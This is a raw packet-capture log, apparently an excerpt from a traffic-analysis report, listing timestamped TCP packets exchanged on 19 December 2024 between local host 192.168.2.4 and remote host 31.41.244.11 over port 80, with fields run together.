                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.161865950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.162014008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.162046909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.162096024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.165251017 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.165309906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.165405989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.165462017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.168661118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.168716908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.168787003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.168840885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.172070980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.172133923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.172216892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.172270060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.175520897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.175591946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.175648928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.175723076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.178905964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.179017067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.179064035 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.179125071 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.182303905 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.182368994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.182456970 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.182622910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.185718060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.185782909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.185847998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.185905933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.189117908 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.189177036 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.189277887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.189333916 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.192514896 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.192574024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.192641973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.192694902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.195904970 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.195960999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.196029902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.196084976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.199330091 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.199423075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.199451923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.199501991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.202730894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.202784061 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.202852964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.202907085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.206150055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.206207037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.206290007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.206346035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.209602118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.209708929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.209709883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.209752083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.212938070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.213021040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.213095903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.213155985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.216404915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.216473103 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.216610909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.216671944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.219775915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.219873905 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.219888926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.219944000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.293555021 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.293670893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.293672085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.293725014 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.294430971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.294493914 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.294667006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.294725895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.297348976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.297410965 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.297457933 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.297514915 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.300247908 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.300311089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.300380945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.300543070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.303217888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.303283930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.303308964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.303374052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.306135893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.306200981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.306282043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.306338072 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.308806896 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.308870077 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.308953047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.309010029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.311541080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.311602116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.311666965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.311723948 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.314193010 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.314260960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.314281940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.314340115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.316817999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.316893101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.316931963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.317048073 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.319423914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.319478989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.319529057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.319582939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.321985006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.322043896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.322118044 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.322174072 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.324512959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.324582100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.324695110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.324748039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.326958895 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.327023983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.327068090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.327121019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.329462051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.329514980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.329521894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.329571962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.331866026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.331928968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.331993103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.332048893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.334239960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.334305048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.334425926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.334486008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.336608887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.336675882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.336718082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.336771965 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.338953972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.339024067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.339073896 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.339144945 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.341327906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.341388941 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.341398954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.341454029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.343540907 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.343600035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.343662024 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.343714952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.345833063 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.345891953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.345963001 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.346018076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.348061085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.348124027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.348180056 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.348232985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.350332975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.350390911 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.350460052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.350565910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.352607965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.352665901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.352736950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.352787971 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.354847908 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.354907990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.354969025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.355025053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.357131958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.357192039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.357275963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.357331991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.359378099 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.359431982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.359431982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.359482050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.361618042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.361680984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.361763954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.361860037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.363850117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.363917112 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.363970995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.364028931 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.366105080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.366164923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.366235971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.366291046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.368407011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.368480921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.368494987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.368573904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.370609999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.370666027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.370750904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.370810032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.372879028 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.372936010 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.372942924 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.373039007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.375124931 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.375185013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.375252008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.375308990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.377384901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.377444983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.377494097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.377549887 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.379621983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.379688025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.379760027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.379815102 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.381891012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.381953001 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.382039070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.382100105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.384182930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.384241104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.384306908 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.384407997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.386389017 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.386447906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.386512041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.386570930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.388669968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.388731003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.388737917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.388792992 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.390933037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.390996933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.391031981 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.391087055 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.393157005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.393214941 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.393275976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.393332005 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.395426989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.395483971 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.395536900 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.395637035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.397660971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.397723913 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.397769928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.397838116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.399918079 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.399981022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.400052071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.400099993 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.402156115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.402214050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.402268887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.402321100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.404442072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.404499054 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.404597998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.404654026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.406685114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.406748056 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.406816959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.406914949 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.408942938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.409002066 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.409074068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.409132004 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.411212921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.411367893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.411370039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.411416054 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.485867977 CET804976331.41.244.11192.168.2.4
